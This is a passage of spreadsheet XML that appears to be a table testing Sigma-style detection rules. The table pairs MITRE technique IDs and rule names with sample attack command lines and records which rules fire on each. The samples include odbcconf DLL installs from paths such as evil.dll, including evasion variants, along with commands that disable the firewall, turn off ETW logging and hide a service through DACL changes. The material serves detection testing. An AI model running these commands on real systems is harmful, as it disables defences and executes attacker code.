          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E4092" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {installdriver "MyDriver|C:\Temp\test.dat"}</t>
        </is>
      </c>
      <c r="F4092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4092" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4092" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4092" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE (cb0fe7c5-f3a3-484d-aa25-d350a7912729); Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4092" s="44" t="n"/>
      <c r="K4092" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4093" ht="15.75" customHeight="1" s="42">
      <c r="A4093" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4093" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C4093" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4093" s="44" t="inlineStr">
        <is>
          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E4093" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER	"MyDriver|C:\Temp\test.dat"}</t>
        </is>
      </c>
      <c r="F4093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4093" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4093" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4093" s="44" t="n"/>
      <c r="K4093" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4094" ht="15.75" customHeight="1" s="42">
      <c r="A4094" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4094" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C4094" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4094" s="44" t="inlineStr">
        <is>
          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E4094" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {"INSTALLDRIVER" "MyDriver|C:\Temp\test.dat"}</t>
        </is>
      </c>
      <c r="F4094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4094" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4094" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4094" s="44" t="n"/>
      <c r="K4094" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4095" ht="15.75" customHeight="1" s="42">
      <c r="A4095" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4095" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C4095" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4095" s="44" t="inlineStr">
        <is>
          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E4095" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /F C:\Temp\response.rsp</t>
        </is>
      </c>
      <c r="F4095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4095" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4095" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4095" s="44" t="n"/>
      <c r="K4095" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4096" ht="15.75" customHeight="1" s="42">
      <c r="A4096" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4096" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C4096" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D4096" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E4096" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|C:\Windows\Temp\\evil.dll"}</t>
        </is>
      </c>
      <c r="F4096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4096" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4096" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4096" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4096" s="44" t="n"/>
      <c r="K4096" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4097" ht="15.75" customHeight="1" s="42">
      <c r="A4097" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4097" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C4097" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D4097" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E4097" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|C:/Windows/Temp/evil.dll"}</t>
        </is>
      </c>
      <c r="F4097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4097" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4097" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4097" s="44" t="n"/>
      <c r="K4097" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4098" ht="15.75" customHeight="1" s="42">
      <c r="A4098" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4098" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C4098" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D4098" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E4098" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|..\..\Windows\Temp\evil.dll"}</t>
        </is>
      </c>
      <c r="F4098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4098" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4098" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4098" s="44" t="n"/>
      <c r="K4098" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4099" ht="15.75" customHeight="1" s="42">
      <c r="A4099" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4099" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C4099" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D4099" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E4099" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|\\?\C:\Windows\Temp\evil.dll"}</t>
        </is>
      </c>
      <c r="F4099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4099" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4099" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4099" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4099" s="44" t="n"/>
      <c r="K4099" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4100" ht="15.75" customHeight="1" s="42">
      <c r="A4100" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C4100" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D4100" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E4100" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /F C:\Temp\response_file.rsp</t>
        </is>
      </c>
      <c r="F4100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4100" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4100" s="44" t="n"/>
      <c r="K4100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4101" ht="15.75" customHeight="1" s="42">
      <c r="A4101" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C4101" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4101" s="44" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E4101" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {regsvr "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F4101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4101" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE (9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70)</t>
        </is>
      </c>
      <c r="J4101" s="44" t="n"/>
      <c r="K4101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4102" ht="15.75" customHeight="1" s="42">
      <c r="A4102" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C4102" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4102" s="44" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E4102" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {REGSVR "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll "}</t>
        </is>
      </c>
      <c r="F4102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4102" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE (9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70)</t>
        </is>
      </c>
      <c r="J4102" s="44" t="n"/>
      <c r="K4102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4103" ht="15.75" customHeight="1" s="42">
      <c r="A4103" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C4103" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4103" s="44" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E4103" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /F C:\AtomicRedTeam\atomics\T1218.008\src\Win32\script.rsp</t>
        </is>
      </c>
      <c r="F4103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4103" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4103" s="44" t="n"/>
      <c r="K4103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4104" ht="15.75" customHeight="1" s="42">
      <c r="A4104" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C4104" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4104" s="44" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E4104" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {REGSVR "C:\Temp\payload.dat"} .dll</t>
        </is>
      </c>
      <c r="F4104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4104" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); New DLL Registered Via Odbcconf.EXE (9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70)</t>
        </is>
      </c>
      <c r="J4104" s="44" t="n"/>
      <c r="K4104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4105" ht="15.75" customHeight="1" s="42">
      <c r="A4105" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C4105" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4105" s="44" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E4105" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {regsvr "C:\Temp\payload.dat"}</t>
        </is>
      </c>
      <c r="F4105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4105" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J4105" s="44" t="n"/>
      <c r="K4105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4106" ht="15.75" customHeight="1" s="42">
      <c r="A4106" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C4106" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4106" s="44" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E4106" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {REGSVR	"C:\Temp\payload.dat"}</t>
        </is>
      </c>
      <c r="F4106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4106" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4106" s="44" t="n"/>
      <c r="K4106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4107" ht="15.75" customHeight="1" s="42">
      <c r="A4107" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C4107" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4107" s="44" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E4107" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {"REGSVR" "C:\Temp\payload.dat"}</t>
        </is>
      </c>
      <c r="F4107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4107" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4107" s="44" t="n"/>
      <c r="K4107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4108" ht="15.75" customHeight="1" s="42">
      <c r="A4108" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C4108" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4108" s="44" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E4108" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /F C:\Temp\response.rsp</t>
        </is>
      </c>
      <c r="F4108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4108" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4108" s="44" t="n"/>
      <c r="K4108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4109" ht="15.75" customHeight="1" s="42">
      <c r="A4109" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C4109" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4109" s="44" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E4109" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /f "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F4109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4109" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4109" s="44" t="n"/>
      <c r="K4109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4110" ht="15.75" customHeight="1" s="42">
      <c r="A4110" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B4110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C4110" s="44" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D4110" s="44" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E4110" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -c "Set-NetFirewallProfile -Enabled False -Public"</t>
        </is>
      </c>
      <c r="F4110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4110" s="44" t="n"/>
      <c r="J4110" s="44" t="n"/>
      <c r="K4110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4111" ht="15.75" customHeight="1" s="42">
      <c r="A4111" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B4111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_modification_cmdline</t>
        </is>
      </c>
      <c r="C4111" s="44" t="inlineStr">
        <is>
          <t>ETW Logging Tamper In .NET Processes Via CommandLine</t>
        </is>
      </c>
      <c r="D4111" s="44" t="inlineStr">
        <is>
          <t>41421f44-58f9-455d-838a-c398859841d4</t>
        </is>
      </c>
      <c r="E4111" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set "COMPlus_ETWEnabled"=0 &amp;&amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"</t>
        </is>
      </c>
      <c r="F4111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4111" s="44" t="n"/>
      <c r="J4111" s="44" t="n"/>
      <c r="K4111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4112" ht="15.75" customHeight="1" s="42">
      <c r="A4112" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C4112" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D4112" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E4112" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name AtomicService -SecurityDescriptorSddl 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'"</t>
        </is>
      </c>
      <c r="F4112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4112" s="44" t="n"/>
      <c r="J4112" s="44" t="n"/>
      <c r="K4112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4113" ht="15.75" customHeight="1" s="42">
      <c r="A4113" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C4113" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D4113" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E4113" s="44" t="inlineStr">
        <is>
          <t>sc.exe "sdset" AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F4113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4113" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE (6c8fbee5-dee8-49bc-851d-c3142d02aa47); Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J4113" s="44" t="n"/>
      <c r="K4113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4114" ht="15.75" customHeight="1" s="42">
      <c r="A4114" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C4114" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D4114" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E4114" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe sdset AtomicService "D:(D;;DCLCWPDT^SD;;;IU)(D;;DCLCWPDT^SD;;;SU)(D;;DCLCWPDT^SD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F4114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4114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4114" s="44" t="n"/>
      <c r="K4114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4115" ht="15.75" customHeight="1" s="42">
      <c r="A4115" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B4115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C4115" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
